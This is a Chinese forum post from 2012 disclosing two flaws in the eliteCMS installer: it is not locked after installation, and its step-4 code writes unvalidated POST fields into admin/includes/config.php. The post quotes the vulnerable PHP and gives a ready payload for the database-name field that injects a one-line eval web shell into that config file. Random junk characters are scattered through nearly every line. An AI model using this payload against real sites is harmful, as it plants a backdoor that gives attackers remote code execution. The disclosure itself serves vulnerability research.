eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
% B5 s& E8 {, _# U6 v$ m- }3 p3 r. c7 M1 W% f
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php: x: g! `( b0 M
我们来看代码:
, J2 J* o2 P& W. J " K+ r X6 `% W+ W8 V; ?- X3 X
.... {; s& ]1 ]8 r/ w! @( U
elseif ($_GET['step'] == "4") {
% {3 e/ F! c( d $file = "../admin/includes/config.php";
1 u9 F. B- w9 K8 Y# m $write = "<?php\n";" j+ H( |& p* O5 Y% M/ w
$write .= "/**\n";; j- p; G# S4 Q/ A* [) C; x& \
$write .= "*\n";9 y- S4 Z5 Z* ^) e+ y2 G/ w6 G
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
. q9 {4 T+ T( T% H; [# v! A" l7 D...略...8 ^% _+ x3 n! k9 M Y* P
$write .= "*\n";( |' w! v, n, V% Z$ f$ Z
$write .= "*/\n";
, r0 R1 U: L i $write .= "\n";6 v' D8 D* a5 H. G+ P
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
0 U# R. _) i) S( q0 F& S# [9 G $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";6 Y* B; i& t* ]6 I
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";6 Z/ y* t2 S. [* i% J# V9 C4 B) T
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";) V, h, x$ q/ L$ G
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
1 `* n6 s: I0 f/ W: k9 C, @ $write .= "if (!\$connection) {\n";: C5 r4 z3 T; g; [) Z' _
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$ j- ^ }4 G' P $write .= " \n";
8 p0 V# n6 [$ R& k5 K% W $write .= "} \n";
* F7 X7 p% [+ ]+ ]& H' p( Q8 R $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";. ~% `5 J& N2 |7 D1 E
$write .= "if (!\$db_select) {\n";
2 f" {; Q+ h" g0 k% h $write .= " die(\"Database select failed\" .mysql_error());\n";
3 n7 J% e/ F' V3 a9 t2 H2 O $write .= " \n";! Z7 Q* w: u- O' z; d+ j& i
$write .= "} \n";
4 S5 }& i* L3 [9 M9 a E- C& q $write .= "?>\n";% ?% P3 k* H: H. p- A. n4 [* H
$ r+ |/ n9 p9 p3 H7 A2 a4 g9 _
$writer = fopen($file, 'w');
) @# ~* |' Q0 h" v T) y8 x9 @...+ G* y) F3 Y! {
; F& z$ u/ C9 h* i, S8 C+ C/ j
在看代码:
) `" }* |4 w G+ x4 q 8 J5 I/ Z+ V8 n* N: @) O
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
/ T2 Q( y8 u2 \- @: D9 N9 `" `" y$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
3 o( A8 H5 s1 m a$_SESSION['DB_USER'] = $_POST['DB_USER'];
0 \' w/ [/ X. O5 ~3 l) ?/ `$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
1 A$ Y- d# M+ t0 Y& r* N3 ^
$ X, \6 T) W2 O% k, n取值未作任何验证
7 s5 A9 t" i- [5 \! }如果将数据库名POST数据:- i2 ]9 k& d8 _, H
+ C, `! ?6 O4 a; G"?><?php eval($_POST[c]);?><?php3 @1 e$ n) O5 D* H! R( [2 T
1 I" M" N3 `# Y/ Q% M D$ R5 x: A
将导致一句话后门写入/admin/includes/config.php, |. w8 E; Q3 i! e t
|
发表于 2012-11-18 13:59:27
收藏
支持
反对